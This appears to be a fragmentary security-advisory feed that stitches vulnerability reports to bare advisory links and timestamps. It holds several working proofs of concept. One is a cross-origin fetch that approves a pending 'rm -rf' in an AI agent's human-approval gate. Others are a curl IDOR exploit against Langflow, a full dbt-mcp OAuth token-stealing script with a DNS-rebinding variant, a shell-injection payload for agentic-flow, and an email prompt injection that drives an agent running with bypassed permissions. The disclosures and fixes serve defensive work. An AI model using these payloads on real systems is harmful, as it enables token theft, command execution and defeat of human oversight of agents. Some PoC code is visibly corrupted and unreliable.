200 ids: [ '07d6f277efe35ac1' ] [attacker] POST /approvals/07d6f277efe35ac1/approve (no auth) -> 200 approved >>> gate decision delivered to agent: {"approved":true,"approvedBy":"attacker"} | WIPED WITHOUT AUTH: true ``` The gated action (`shell_execute: rm -rf /important/data`, `riskLevel: high`) is approved by a client that sent **no `Authorization` header**, and the `ApprovalGate` promise resolves `{ approved: true }` — the agent proceeds. Browser CSRF variant (no tooling, just a visited page): ```html fetch('http://127.0.0.1:PORT/approvals/?status=pending') // ACAO:* -> readable .then(r => r.json()) .then(list => list.forEach(e => fetch(`http://127.0.0.1:PORT/approvals/${e.id}/approve`, { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ approvedBy: 'attacker' }) // preflight passes via ACAO:* }))); ``` ## Impact The Approval Gate is the package's human-in-the-loop safety control for high-risk agent operations (shell commands, file writes, budget spend — SECURITY.md). Unauthenticated, cross-origin access to its inbox lets an attacker: - **Approve** any pending gated action → the agent executes an operation that was explicitly held for human review (integrity/availability impact; the gated action is whatever the agent proposed). - **Read** pending requests (`GET /approvals`, `/stats`) → disclosure of queued action details (command strings, file paths, justifications). - **Deny** pending actions → suppress legitimate operations. The attacker controls the *approval decision*, not the action content, but the net effect is that the human-in-the-loop guarantee is void for any deployment that exposes the inbox — which is the inbox's documented purpose ("web-accessible approval queue"). ## Alignment with the security policy & documentation (in scope; not intended/documented behavior) This finding does not contradict any documented design choice — it exposes a gap the documentation overlooks, and it matches a vulnerability class the maintainer has already accepted: - **Documented as a *security measure*, never as intentionally unauthenticated.** `SECURITY.md` lists the Approval Inbox under "Security Measures in Network-AI" — *"`ApprovalInbox` provides a web-accessible approval queue with REST API (`/list`, `/approve/:id`, `/deny/:id`, `/stats`)"* — and `README.md` / `ENTERPRISE.md` describe it the same way. **No** document states it requires authentication, nor that the operator must place it behind their own auth. A documented security control (human-in-the-loop approval for *"writes, shell commands, budget spend"*) that anyone can bypass without credentials is a defect in that control, not its intended behavior. - **The project's own threat model treats this exact adversary as in scope.** `THREAT_MODEL.md` §3.1 designs against an *"Unauthenticated Network Caller"* that can reach a bound TCP port, with mitigations: *require a non-empty secret, default to `127.0.0.1`, warn on non-loopback bind.* It applies all of these to the MCP server — but it **never lists `ApprovalInbox` as a network boundary at all** (an omission, not a carve-out), and the inbox has **none** of those mitigations. - **Direct precedent — the maintainer already fixed this class.** The identical issue on the MCP server was accepted and patched: **GHSA-j3vx-cx2r-pvg8** ("Unauthenticated Cross-Origin MCP Tool Invocation," fixed in v5.4.5 by requiring a secret and **restricting CORS to localhost origins**) and **GHSA-r78r-rwrf-rjwp** (fail-closed on empty secret, v5.7.2). The `ApprovalInbox` is a second network-reachable server with the same flaw; it simply never received that hardening. - **No carve-out covers it.** The threat model's Explicit Non-Goals (localhost-IPC encryption, SLA, anti-analysis, npm-registry compromise) don't apply, and the documented ClawHub "by-design" Notes (ASI01 goal-hijack, ASI03 advisory tokens, ASI06 context poisoning, ASI07 *inter-agent messaging*) are unrelated — the approval inbox is a **control plane**, not inter-agent transport. - **The operator cannot fix it within the library.** Unlike the MCP server (which now *accepts* a secret), `ApprovalInbox` exposes **no** auth option and **hardcodes** `Access-Control-Allow-Origin: *`. So "the operator should add auth / restrict CORS" is not available — there is no hook to do so. And "it's opt-in / operator-exposed" did not exempt the MCP server, which is equally optional and explicitly started. **Honest scope caveat (state it plainly in the report).** `ApprovalInbox.startServer()` is opt-in (not auto-started by a CLI bin) and defaults to `127.0.0.1`, so the realistic vectors are (a) the wildcard-CORS drive-by from a page the operator visits, (b) a co-located/SSRF local process, or (c) a non-loopback bind. That bounds severity to Medium–High — but it is squarely the same class, on the same kind of surface, that the project's threat model and prior advisories already treat as a vulnerability. ## Recommended fix 1. **Require a bearer secret** on the inbox HTTP server, fail closed on empty secret, and verify it on `/approve`, `/deny`, and ideally the list/stats/SSE routes — mirroring the hardening already applied to `McpSseServer`/`McpHttpServer`. 2. **Remove the hardcoded `Access-Control-Allow-Origin: *`**; default to no CORS (same-origin) or an explicit allowlist, and never reflect `*` on the mutating routes. 3. Optionally add a CSRF token / require a non-simple custom header on `POST` to block browser-driven approval. ## References - [CWE-862](https://cwe.mitre.org/data/definitions/862.html), [CWE-352](https://cwe.mitre.org/data/definitions/352.html) - Affected: `lib/approval-inbox.ts` (`httpHandler` l.256 CORS, `routeRequest` l.369-405 no-auth approve/deny, `startServer` l.281); exported at `index.ts:1126`. - Same class as prior **accepted** advisories: GHSA-fj4g-2p96-q6m3 (MCP missing auth, fixed v5.1.3), GHSA-j3vx-cx2r-pvg8 (MCP unauthenticated cross-origin invocation — fixed v5.4.5 by requiring a secret + restricting CORS to localhost), GHSA-r78r-rwrf-rjwp (MCP fail-closed on empty secret, v5.7.2). The `ApprovalInbox` server never received this hardening. - Documentation this finding is measured against: `SECURITY.md` (Approval Inbox listed under "Security Measures"; Approval Gate = human-in-the-loop for "writes, shell commands, budget spend"), `THREAT_MODEL.md` §3.1 ("Unauthenticated Network Caller" adversary + its mitigations), `README.md` / `ENTERPRISE.md` ("web-accessible approval queue"). None document the inbox as intentionally unauthenticated or require operator-supplied auth. - Disclosure: GitHub private security advisory (Jovancoding/Network-AI → Security → "Report a vulnerability"), per SECURITY.md. --- ### Resolution (maintainer) **Fixed in [v5.12.2](https://github.com/Jovancoding/Network-AI/releases/tag/v5.12.2) (commit `a59c13a`).** Install: `npm install network-ai@5.12.2` — published to npm with provenance. `ApprovalInbox` now accepts a `secret` option. When set, the mutating endpoints `POST /:id/approve` and `POST /:id/deny` require an `Authorization: Bearer ` header, validated in constant time with `crypto.timingSafeEqual`. `startServer()` already binds to `127.0.0.1` by default; operators exposing the inbox on a network must set a secret. All 3,269 tests pass against the patched build. Thanks to @EchoSkorJjj for the responsible disclosure.]]> Sat, 20 Jun 2026 01:00:02 +0000 https://github.com/advisories/GHSA-ccv6-r384-xp75 Sat, 20 Jun 2026 01:00:02 +0000 https://github.com/advisories/GHSA-qwqc-p3q8-wcg9 Sat, 20 Jun 2026 01:00:02 +0000 https://nvd.nist.gov/vuln/detail/CVE-2026-50519 Sat, 20 Jun 2026 18:00:47 +0000 https://github.com/advisories/GHSA-7hw8-6q6r-4276 Sat, 20 Jun 2026 01:00:02 +0000 https://nvd.nist.gov/vuln/detail/CVE-2026-47645 Sat, 20 Jun 2026 18:00:47 +0000 https://github.com/advisories/GHSA-qrpv-q767-xqq2 FlowRead: async with session_scope() as session: try: flow_id = UUID(flow_id_or_name) # When using UUID, query directly WITHOUT checking user_id flow = await session.get(Flow, flow_id) # ❌ No user_id check! except ValueError: endpoint_name = flow_id_or_name stmt = select(Flow).where(Flow.endpoint_name == endpoint_name) # Only when using endpoint_name is user_id checked if user_id: stmt = stmt.where(Flow.user_id == uuid_user_id) ``` This function is used by the `/api/v1/responses` endpoint (defined in [`src/backend/base/langflow/api/v1/openai_responses.py:589`](https://github.com/langflow-ai/langflow/blob/v1.9.0/src/backend/base/langflow/api/v1/openai_responses.py#L589)). ## PoC (Proof of Concept) ```bash # Attacker (user A) with API_KEY_A tries to execute victim (user B)'s flow curl -X POST "http://localhost:7860/api/v1/responses" \ -H "x-api-key: sk-ATTACKER_API_KEY" \ -H "Content-Type: application/json" \ -d '{ "model": "VICTIM_FLOW_ID", "input_value": "test", "stream": false }' # Returns 200 and executes the victim's flow ``` ## Impact Any authenticated user can: 1. Execute any flow in the system by knowing its flow ID 2. Access potentially sensitive data processed by victim's flows 3. Consume victim's resources ## Fixes Fixed in **PR #12832** (`fix(security): close IDOR in get_flow_by_id_or_endpoint_name`), merged 2026-04-22, released in **Langflow 1.9.1**. The helper normalizes `user_id` once and enforces ownership on **both** lookup branches (UUID *and* `endpoint_name`): ```python flow_id = UUID(flow_id_or_name) flow = await session.get(Flow, flow_id) if flow is not None and uuid_user_id is not None and flow.user_id != uuid_user_id: flow = None # cross-user lookup falls through to the shared 404 ``` Key points: - Cross-user lookups return **404** (not 403), so flow existence is not disclosed via a 403-vs-404 oracle. - `/api/v1/responses` and `/api/v2/workflow` pass `user_id` explicitly, so fixing the helper closes them directly; the `/api/v1/run*` routes were additionally moved from a bare `Depends(get_flow_by_id_or_endpoint_name)` to auth-aware wrapper dependencies (defense in depth). - A malformed `user_id` now fails closed (404 instead of a raw 500). - Webhook routes intentionally keep the unscoped lookup (public by design / explicit ownership check elsewhere). - Regression tests cover the cross-user UUID case and reproduce the original PoC against `/api/v1/responses`. ## Acknowledgements Thanks to the security researchers who responsibly disclosed this vulnerability: * @yzeirnials * @johnatzeropath * @LeftenantZero * @Zwique]]> Sat, 20 Jun 2026 01:00:02 +0000 https://nvd.nist.gov/vuln/detail/CVE-2026-42895 Sat, 20 Jun 2026 18:00:47 +0000 https://github.com/advisories/GHSA-jr33-mw75-7j8f DbtPlatformContext: logger.info("Selected project received") return dbt_platform_context_manager.read_context() or DbtPlatformContext() ``` ```python # src/dbt_mcp/oauth/dbt_platform.py:8-14 class AccessTokenResponse(BaseModel): access_token: str refresh_token: str ... class DbtPlatformContext(BaseModel): decoded_access_token: DecodedAccessToken | None = None ... ``` **Missing protections (confirmed by grep):** - No `TrustedHostMiddleware` — the server accepts requests with arbitrary `Host` headers, enabling DNS rebinding. - No `CORSMiddleware` — no cross-origin restrictions on which sites can read the response. - No CSRF protection, no session nonce, no `Origin` header validation. - The route has no FastAPI `Depends()` security dependency. A `grep -Rni "TrustedHostMiddleware\|CORSMiddleware\|csrf\|origin"` across the OAuth FastAPI application returns no results. **Recommended remediation:** ```diff --- a/src/dbt_mcp/oauth/fastapi_app.py +++ b/src/dbt_mcp/oauth/fastapi_app.py +from starlette.middleware.trustedhost import TrustedHostMiddleware + +def _redact_context(context: DbtPlatformContext | None) -> DbtPlatformContext: + if context is None: + return DbtPlatformContext() + return context.model_copy(update={"decoded_access_token": None}) app = FastAPI() + app.add_middleware( + TrustedHostMiddleware, + allowed_hosts=["localhost", "127.0.0.1"], + ) @app.get("/dbt_platform_context") def get_dbt_platform_context() -> DbtPlatformContext: logger.info("Selected project received") - return dbt_platform_context_manager.read_context() or DbtPlatformContext() + return _redact_context(dbt_platform_context_manager.read_context()) ``` ### PoC **Prerequisites:** - `dbt-mcp` v1.19.1 installed in a Python 3.12 environment. - The following runtime dependencies available: `authlib~=1.6.7`, `fastapi~=0.128.0`, `uvicorn~=0.38.0`, `pyyaml~=6.0.2`, `httpx~=0.28.1`, `starlette~=0.50.0`, `pydantic~=2.0`, `pydantic-settings~=2.10.1`. - No `DBT_TOKEN` set (OAuth flow mode active). **Step 1 — Build the Docker test environment:** ```bash docker build -t vuln001-dbt-mcp -f vuln-001/Dockerfile . ``` The `Dockerfile` installs only the OAuth helper's runtime dependencies and copies `src/` and `poc.py`: ```dockerfile FROM python:3.12-slim WORKDIR /app RUN pip install --no-cache-dir \ "authlib~=1.6.7" "fastapi~=0.128.0" "uvicorn~=0.38.0" \ "pyjwt~=2.12.0" "pyyaml~=6.0.2" "httpx~=0.28.1" \ "filelock~=3.20.3" "starlette~=0.50.0" "requests>=2.28" \ "pydantic~=2.0" "pydantic-settings~=2.10.1" COPY repo/src /app/src ENV PYTHONPATH=/app/src COPY vuln-001/poc.py /app/poc.py CMD ["python3", "/app/poc.py"] ``` **Step 2 — Run the PoC:** ```bash docker run --rm --network=host vuln001-dbt-mcp ``` The PoC script (`poc.py`) performs the following automatically: 1. Writes a realistic fake OAuth context YAML to `/tmp/dbt_poc_mcp.yml`, simulating a victim who has already completed the OAuth login flow. 2. Instantiates the **real** `create_app()` from `src/dbt_mcp/oauth/fastapi_app.py` using `DbtPlatformContextManager` backed by the pre-seeded file. 3. Starts the server on `127.0.0.1:16785` in a background thread. 4. Issues an unauthenticated `GET /dbt_platform_context` with no `Authorization` header. 5. Asserts that `access_token` and `refresh_token` are returned verbatim. **Equivalent manual curl (against the live OAuth helper during actual OAuth flow):** ```bash # While the victim is running the OAuth login flow: export DBT_HOST='cloud.getdbt.com' unset DBT_TOKEN dbt-mcp # OAuth helper starts on 127.0.0.1:6785 # From any co-located process (or a DNS-rebinding browser page): curl -s 'http://127.0.0.1:6785/dbt_platform_context' \ | jq '.decoded_access_token.access_token_response' ``` **Expected output (Phase 2 observed):** ``` [*] HTTP Status: 200 [*] Full response JSON: { "decoded_access_token": { "access_token_response": { "access_token": "eyJhbGciOiJSUzI1NiJ9.VICTIM_ACCESS_TOKEN_PLACEHOLDER", "refresh_token": "dbt-platform-offline-refresh-SUPERSECRET-abc123", "expires_in": 3600, "scope": "user_access offline_access", "token_type": "Bearer", "expires_at": 9999999999 }, ... }, ... } [!] LEAKED access_token : eyJhbGciOiJSUzI1NiJ9.VICTIM_ACCESS_TOKEN_PLACEHOLDER [!] LEAKED refresh_token : dbt-platform-offline-refresh-SUPERSECRET-abc123 [+] VULNERABILITY CONFIRMED: Tokens returned from /dbt_platform_context WITHOUT authentication! ``` **DNS rebinding variant:** A malicious website can resolve `attacker.example` to `127.0.0.1` after the browser's DNS TTL expires ("DNS rebinding"). Because the helper accepts any `Host` header, the browser treats `http://attacker.example:6785` as same-origin and fetches `/dbt_platform_context` via JavaScript `fetch()`, obtaining the full token JSON across the network without any local access. ### Impact Any local process running as any user on the same host, or a remote attacker who exploits DNS rebinding against a victim's browser during or after the OAuth login session, can retrieve the victim's full dbt Cloud OAuth tokens with a single unauthenticated HTTP GET request. The `access_token` grants immediate bearer-token access to the dbt Cloud REST and GraphQL APIs on behalf of the victim. The `refresh_token` (with `offline_access` scope) allows the attacker to obtain new access tokens after the original expires, providing persistent unauthorized access until the victim manually revokes the OAuth grant. An attacker with these tokens can read or modify dbt projects, run jobs, access environment secrets, and exfiltrate data lineage and warehouse credentials stored in dbt Cloud. This vulnerability is a **Missing Authentication for Critical Function** (CWE-306). Any developer machine running `dbt-mcp` with OAuth-mode authentication is affected for the duration of the OAuth helper process lifetime. Because `dbt-mcp` is a developer tool, the primary victims are individual developers and their associated dbt Cloud organization accounts. ### Reproduction artifacts #### `Dockerfile` ```dockerfile FROM python:3.12-slim WORKDIR /app # Install minimal runtime dependencies (no heavy dbt-protos/dbt-sl-sdk needed # because fastapi_app.py's import chain doesn't touch them) RUN pip install --no-cache-dir \ "authlib~=1.6.7" \ "fastapi~=0.128.0" \ "uvicorn~=0.38.0" \ "pyjwt~=2.12.0" \ "pyyaml~=6.0.2" \ "httpx~=0.28.1" \ "filelock~=3.20.3" \ "starlette~=0.50.0" \ "requests>=2.28" \ "pydantic~=2.0" \ "pydantic-settings~=2.10.1" # Copy only the source tree needed for the OAuth server COPY repo/src /app/src ENV PYTHONPATH=/app/src COPY vuln-001/poc.py /app/poc.py CMD ["python3", "/app/poc.py"] ``` #### `poc.py` ```python #!/usr/bin/env python3 """ PoC for VULN-001: Unauthenticated OAuth Con Endpoint Leaks dbt Platform Tokens Attack scenario: - dbt-mcp runs a local FastAPI OAuth helper on 127.0.0.1:6785 during login. - After the OAuth flow completes, tokens are persisted to ~/.dbt/mcp.yml. - GET /dbt_platform_con is accessible with NO authentication at all. - Any process on the same host (or a DNS-rebinding browser page) can call it and receive the full access_token + refresh_token. This PoC: 1. Pre-seeds a con file with fake-but-realistic OAuth tokens (simulating a victim who has already completed the OAuth flow). 2. Starts the real vulnerable FastAPI app from src/dbt_mcp/oauth/fastapi_app.py. 3. Issues an unauthenticated HTTP GET /dbt_platform_con (no auth header). 4. Confirms the tokens are returned verbatim. """ import asyncio import json import os import sys import tempfile import threading import time from pathlib import Path import httpx import uvicorn import yaml # Fake tokens that simulate a victim's completed OAuth session. FAKE_ACCESS_TOKEN = "eyJhbGciOiJSUzI1NiJ9.VICTIM_ACCESS_TOKEN_PLACEHOLDER" FAKE_REFRESH_TOKEN = "dbt-platform-offline-refresh-SUPERSECRET-abc123" FAKE_CONTEXT = { "decoded_access_token": { "access_token_response": { "access_token": FAKE_ACCESS_TOKEN, "refresh_token": FAKE_REFRESH_TOKEN, "expires_in": 3600, "scope": "user_access offline_access", "token_type": "Bearer", "expires_at": 9999999999, }, "decoded_claims": { "sub": "99999", "iat": 1700000000, "exp": 9999999999, }, }, "host_prefix": "victimco", "dbt_host": "cloud.getdbt.com", "account_id": 42, "selected_project_ids": None, "dev_environment": None, "prod_environment": None, } PORT = 16785 def start_server(context_file: Path, static_dir: str) -> None: """Run the actual vulnerable FastAPI app in a background thread.""" from authlib.integrations.requests_client import OAuth2Session from dbt_mcp.oauth.context_manager import DbtPlatformContextManager from dbt_mcp.oauth.fastapi_app import create_app context_manager = DbtPlatformContextManager(context_file) # A dummy OAuth client — only used by the /oauth-callback route, # which this PoC never triggers. fake_oauth_client = OAuth2Session(client_id="poc-dummy-client") app = create_app( oauth_client=fake_oauth_client, state_to_verifier={}, dbt_platform_url="https://cloud.getdbt.com", static_dir=static_dir, dbt_platform_context_manager=context_manager, ) loop = asyncio.new_event_loop() asyncio.set_event_loop(loop) config = uvicorn.Config( app=app, host="127.0.0.1", port=PORT, log_level="error", loop="asyncio" ) server = uvicorn.Server(config) loop.run_until_complete(server.serve()) def wait_for_server(port: int, timeout: float = 15.0) -> bool: import socket deadline = time.time() + timeout while time.time() < deadline: try: with socket.create_connection(("127.0.0.1", port), timeout=1): return True except OSError: time.sleep(0.2) return False def main() -> int: print("[*] VULN-001 PoC — Unauthenticated /dbt_platform_con token leak") print("=" * 70) # 1. Pre-seed con file (victim has completed OAuth; tokens are on disk) context_file = Path("/tmp/dbt_poc_mcp.yml") context_file.write_( yaml.dump(FAKE_CONTEXT, default_flow_style=False), encoding="utf-8" ) print(f"[*] Con file written: {context_file}") print(f" access_token : {FAKE_ACCESS_TOKEN}") print(f" refresh_token : {FAKE_REFRESH_TOKEN}") # 2. Minimal static dir so NoCacheStaticFiles mount doesn't error on startup static_dir = tempfile.mkdtemp(prefix="dbt_poc_static_") (Path(static_dir) / "index.html").write_("dbt OAuth") # 3. Start the real vulnerable FastAPI server in a background thread t = threading.Thread( target=start_server, args=(context_file, static_dir), daemon=True ) t.start() print(f"\n[*] Waiting for FastAPI server to start on 127.0.0.1:{PORT} ...") if not wait_for_server(PORT): print("[-] FAIL: Server did not start within timeout.") return 2 print("[*] Server is up.") # 4. Send unauthenticated GET /dbt_platform_con (no Authorization header) url = f"http://127.0.0.1:{PORT}/dbt_platform_con" print(f"\n[*] Sending unauthenticated GET {url}") try: resp = httpx.get(url, timeout=10) except Exception as exc: print(f"[-] HTTP request failed: {exc}") return 2 print(f"[*] HTTP Status: {resp.status_code}") if resp.status_code != 200: print(f"[-] FAIL: Expected 200, got {resp.status_code}") print(f" Body: {resp.[:500]}") return 1 try: data = resp.json() except Exception as exc: print(f"[-] FAIL: Response is not JSON: {exc}\n Body: {resp.[:500]}") return 1 print(f"\n[*] Full response JSON:\n{json.dumps(data, indent=2)}") # 5. Verify that the tokens are in the response (no redaction, no auth required) try: leaked_access = ( data["decoded_access_token"]["access_token_response"]["access_token"] ) leaked_refresh = ( data["decoded_access_token"]["access_token_response"]["refresh_token"] ) except (KeyError, TypeError) as exc: print(f"\n[-] FAIL: Token fields missing from response: {exc}") return 1 print(f"\n[!] LEAKED access_token : {leaked_access}") print(f"[!] LEAKED refresh_token : {leaked_refresh}") if leaked_access == FAKE_ACCESS_TOKEN and leaked_refresh == FAKE_REFRESH_TOKEN: print( "\n[+] VULNERABILITY CONFIRMED:" " Tokens returned from /dbt_platform_con WITHOUT authentication!" ) return 0 else: print("\n[-] FAIL: Returned tokens do not match expected values.") print(f" Expected access_token : {FAKE_ACCESS_TOKEN}") print(f" Got access_token : {leaked_access}") return 1 if __name__ == "__main__": sys.exit(main()) ```]]> Sat, 20 Jun 2026 01:00:02 +0000 https://github.com/advisories/GHSA-v75r-vx73-82pj Sat, 20 Jun 2026 01:00:02 +0000 https://github.com/advisories/GHSA-v52w-28xh-v562 Sat, 20 Jun 2026 01:00:02 +0000 https://nvd.nist.gov/vuln/detail/CVE-2026-48774 Sat, 20 Jun 2026 18:00:47 +0000 https://github.com/advisories/GHSA-v5jw-96jm-7h2c Sat, 20 Jun 2026 01:00:04 +0000 https://github.com/advisories/GHSA-rgh6-rfwx-v388 Sat, 20 Jun 2026 01:00:04 +0000 https://github.com/advisories/GHSA-xhf5-7wjv-pqxp Sat, 20 Jun 2026 01:00:04 +0000 https://github.com/advisories/GHSA-cvxm-645q-p574 Sat, 20 Jun 2026 01:00:04 +0000 https://github.com/advisories/GHSA-4m4j-hmqq-3gxm Sat, 20 Jun 2026 01:00:04 +0000 https://github.com/advisories/GHSA-34w5-c283-j9fg Sat, 20 Jun 2026 01:00:04 +0000 https://thehackernews.com/2026/06/autojack-attack-lets-one-web-page.html Sat, 20 Jun 2026 18:00:01 +0000 https://nvd.nist.gov/vuln/detail/CVE-2023-54353 Sat, 20 Jun 2026 12:00:44 +0000 https://github.com/advisories/GHSA-vcv2-r9jh-99m5 /tmp/rce.txt; echo "" ``` When `execSync` hands that to `/bin/sh -c`, the shell parses three commands: the truncated `npx`, then `touch /tmp/INJECTED`, then `id > /tmp/rce.txt; echo ""`. The marker file `/tmp/INJECTED` is created and the user's `id` output is written to `/tmp/rce.txt`. ## Patches Fixed in [`agentic-flow@2.0.14`](https://www.npmjs.com/package/agentic-flow/v/2.0.14) — every affected call site rewritten to use `execFileSync(file, argv, { shell: false })` so attacker-controlled argv elements are passed straight to `execve(2)` without shell parsing. Fix PR: ruvnet/agentic-flow#170 (merged at `0c2ec96`) A regression test (`tests/security/cwe-78-mcp-execsync.test.ts`) was added that statically scans every `src/mcp/**/*.ts` file and fails the build if any new `execSync()` call is reintroduced outside of a documented exemption, plus a behavioural smoke check that the canonical PoC payload remains inert when passed as an argv element to `execFileSync`. ## Workarounds Upgrade to `agentic-flow >= 2.0.14`. There is no in-product configuration that mitigates this without upgrading. ## Downstream pin The `ruflo` / `claude-flow` / `@claude-flow/cli` packages bumped from `3.12.3` → `3.12.4` to pull the patched `agentic-flow`: - `ruflo@3.12.4` - `claude-flow@3.12.4` - `@claude-flow/cli@3.12.4` End users running any of `npx ruflo@latest`, `npx claude-flow@latest`, or `npx @claude-flow/cli@latest` are pinned to the fixed version. ## Credit Reported by **hackchang** via a well-scoped red-team report package (`npm_agentic-flow_report_package_20260618_163017.zip`) that included a sink inventory, a minimized PoC payload, and a clear explanation of why this was a partial-fix gap rather than intended behaviour. The sink inventory directly drove the single-grep pass that closed every reachable call site; the PoC payload became the behavioural smoke test that proves the canonical attack stays inert as an argv element.]]> Sat, 20 Jun 2026 01:00:04 +0000 https://github.com/advisories/GHSA-jv2h-4p9v-wf5w Sat, 20 Jun 2026 01:00:04 +0000 https://github.com/advisories/GHSA-c2g3-c4gc-w5wg Sat, 20 Jun 2026 01:00:04 +0000 https://github.com/advisories/GHSA-r78r-rwrf-rjwp HTTP 200, dispatched=true body: {"jsonrpc":"2.0","id":1,"result":{"executed":true,"tool":"config_set"}} POST /mcp Origin: evil.example.com -> ACAO=undefined (CORS half fixed) ``` The no-auth request passes `_isAuthorized` and reaches `handleRPC` (tool dispatched) — i.e. unauthenticated tool invocation persists on the latest release; only the browser-CORS read amplifier was removed. Run: from a v5.7.1 checkout, `npm i` then `npx ts-node --transpile-only poc/legend-networkai-empty-secret.ts`. ## Recommended fix Implement the advisory's remediation #1: refuse to start SSE mode with an empty secret (unless `--stdio`), and/or change `_isAuthorized` to fail closed (an empty configured secret should mean "deny", not "allow"). The CORS allowlist alone does not authenticate non-browser callers. ## Precondition / honesty With CORS now localhost-only, the drive-by *browser* attack is mitigated. The residual requires a non-browser path to the port: an SSRF on the host, or the operator binding to a non-loopback address (Docker/remote), which the fix only warns about. The empty secret remains the shipped default and `_isAuthorized` still authorizes it. ## Credits @Kai Aizen / @SnailSploit — https://snailsploit.com]]> Sat, 20 Jun 2026 01:00:04 +0000 https://www.bleepingcomputer.com/news/security/every-ai-agent-is-an-identity-most-organizations-dont-treat-them-that-way/ Sat, 20 Jun 2026 18:00:01 +0000 https://thehackernews.com/2026/06/from-assistive-to-agentic-ai-shift.html Sat, 20 Jun 2026 18:00:01 +0000 https://www.securityweek.com/cisco-to-acquire-widefield-security-to-boost-splunks-agentic-soc/ Sat, 20 Jun 2026 18:00:01 +0000 https://nvd.nist.gov/vuln/detail/CVE-2026-12048 Fri, 19 Jun 2026 12:00:31 +0000 https://nvd.nist.gov/vuln/detail/CVE-2026-12045 Fri, 19 Jun 2026 12:00:31 +0000 https://nvd.nist.gov/vuln/detail/CVE-2026-56075 Fri, 19 Jun 2026 12:00:31 +0000 https://nvd.nist.gov/vuln/detail/CVE-2026-54130 Fri, 19 Jun 2026 12:00:31 +0000 https://nvd.nist.gov/vuln/detail/CVE-2026-49257 Fri, 19 Jun 2026 12:00:31 +0000 https://github.com/advisories/GHSA-4h5r-5jm8-jxjm Fri, 19 Jun 2026 01:00:02 +0000 https://github.com/advisories/GHSA-m973-pr9r-hp2w Sat, 20 Jun 2026 01:00:04 +0000 https://github.com/advisories/GHSA-qwjm-9c66-w4q4 Sat, 20 Jun 2026 01:00:04 +0000 https://github.com/advisories/GHSA-3jww-hxqj-wfq2 Sat, 20 Jun 2026 01:00:04 +0000 https://github.com/advisories/GHSA-fq4x-789w-jg5h API hop, not the external sender, so `from`/`subject`/`preview` are attacker-controlled. Privileged sink (bridge-wake, bypassPermissions): - `packages/claudecode/src/dispatcher.ts:2040` `handleBridgeMail` extracts `subject`/`from`/`preview` (`:2045-2049`) and calls `planBridgeWake({ session, mail: { ..., from, preview } })` (`:2052`) with NO sender check — routing keys only on session freshness (skip-live / escalate / resume). - `planBridgeWake` -> `packages/core/src/host-bridge.ts:141` `composeBridgeWakePrompt` embeds the untrusted `from`/`subject`/`preview` (preview sliced to 600 chars at `:144`) verbatim into the prompt. - `packages/claudecode/src/bridge-wake.ts:103` `resumeBridgeSession` runs the prompt via the Claude Code SDK with `permissionMode: 'bypassPermissions'` against the operator's last session (resume + same mcpServers). Guarded sibling (same class, authenticated): `packages/api/src/routes/inbound.ts:102` rejects an operator-query email reply unless `isOperatorReplySender(replyFrom, config.operatorEmail)` (def `packages/core/src/phone/realtime-tools.ts:999`, fail-closed when no operatorEmail), with a v0.9.53 security-review comment (`inbound.ts:93-100`) stating inbound mail provenance is untrusted and an emailed answer is only honored when its From matches the configured operator. The Telegram sibling likewise gates on `operatorChatId`. The bridge-wake path ignores this exact lesson. Secondary instance (same root cause): `packages/core/src/gateway/manager.ts:261` `tryProcessApprovalReply` releases a held outbound email on an "approve" reply matched only by `In-Reply-To` / `notification_message_id`, with no sender check — again unlike the `isOperatorReplySender` sibling. ## Impact In a configured headless-bridge deployment (operator uses the CLI so a host-session is saved; session fresh arbitrary OS command execution, filesystem read/write, and exfiltration under the operator's OAuth identity. The auth gap (no sender check on the bridge path) is structural and unconditional; the impact realization is config-conditional and depends on the resumed model following injected instructions. ## Proof of concept (static / request-difference; dynamic on operator's OWN setup only) Static: the from/subject/preview extracted at dispatcher.ts:2045-2049 flow into composeBridgeWakePrompt (host-bridge.ts:141) and resumeBridgeSession (bridge-wake.ts:103) with no interposed sender check, while the sibling inbound.ts:102 has one — the same untrusted-From provenance is authenticated on one privileged email path and not on the higher-privileged one. Dynamic (own instance only): with a configured bridge + fresh host-session, send mail from a non-operator address into the bridge inbox whose subject/preview contains a benign instruction writing a fresh CSPRNG marker; observe the resumed bypassPermissions session act on it. Use only your own instance; do not target third-party deployments. ## Suggested fix Mirror the guarded sibling: before any `bypassPermissions` resume (dispatcher.ts handleBridgeMail, before planBridgeWake), require trusted provenance — an internal sub-agent wake OR `isOperatorReplySender(from, config.operatorEmail)`; otherwise deliver the mail normally but do NOT resume. Reuse the existing exported `isOperatorReplySender` from @agenticmail/core so the two privileged email paths share one authentication helper. Defense-in-depth: in composeBridgeWakePrompt, wrap the untrusted fields in explicit untrusted-data delimiters and drop `bypassPermissions` for mail-triggered resumes whose provenance is not the operator. Apply the same sender gate to `tryProcessApprovalReply` (manager.ts:261). ## Affected versions Present on current HEAD (core 0.9.42 / claudecode 0.2.38, commit b95f52e). No fix retrofits the sender check onto bridge-wake. ## Severity (honest, both ways) HIGH, plausibly CRITICAL in a configured headless-bridge deployment. Ceiling ~9.0 (unauthenticated external sender -> operator-privileged code execution). Floor ~7.0: the auth gap is unconditional, but full impact requires (1) a fresh]]> Fri, 19 Jun 2026 01:00:02 +0000 https://github.com/advisories/GHSA-hjwc-26pj-v3pm Fri, 19 Jun 2026 01:00:02 +0000 https://nvd.nist.gov/vuln/detail/CVE-2026-55237 Fri, 19 Jun 2026 12:00:31 +0000 https://nvd.nist.gov/vuln/detail/CVE-2025-32437 Fri, 19 Jun 2026 12:00:31 +0000 https://nvd.nist.gov/vuln/detail/CVE-2025-32436 Fri, 19 Jun 2026 12:00:31 +0000 https://nvd.nist.gov/vuln/detail/CVE-2025-32424 Fri, 19 Jun 2026 12:00:31 +0000 https://nvd.nist.gov/vuln/detail/CVE-2025-32422 Fri, 19 Jun 2026 12:00:31 +0000 https://nvd.nist.gov/vuln/detail/CVE-2025-32392 Fri, 19 Jun 2026 12:00:31 +0000 https://nvd.nist.gov/vuln/detail/CVE-2026-46580 Fri, 19 Jun 2026 12:00:31 +0000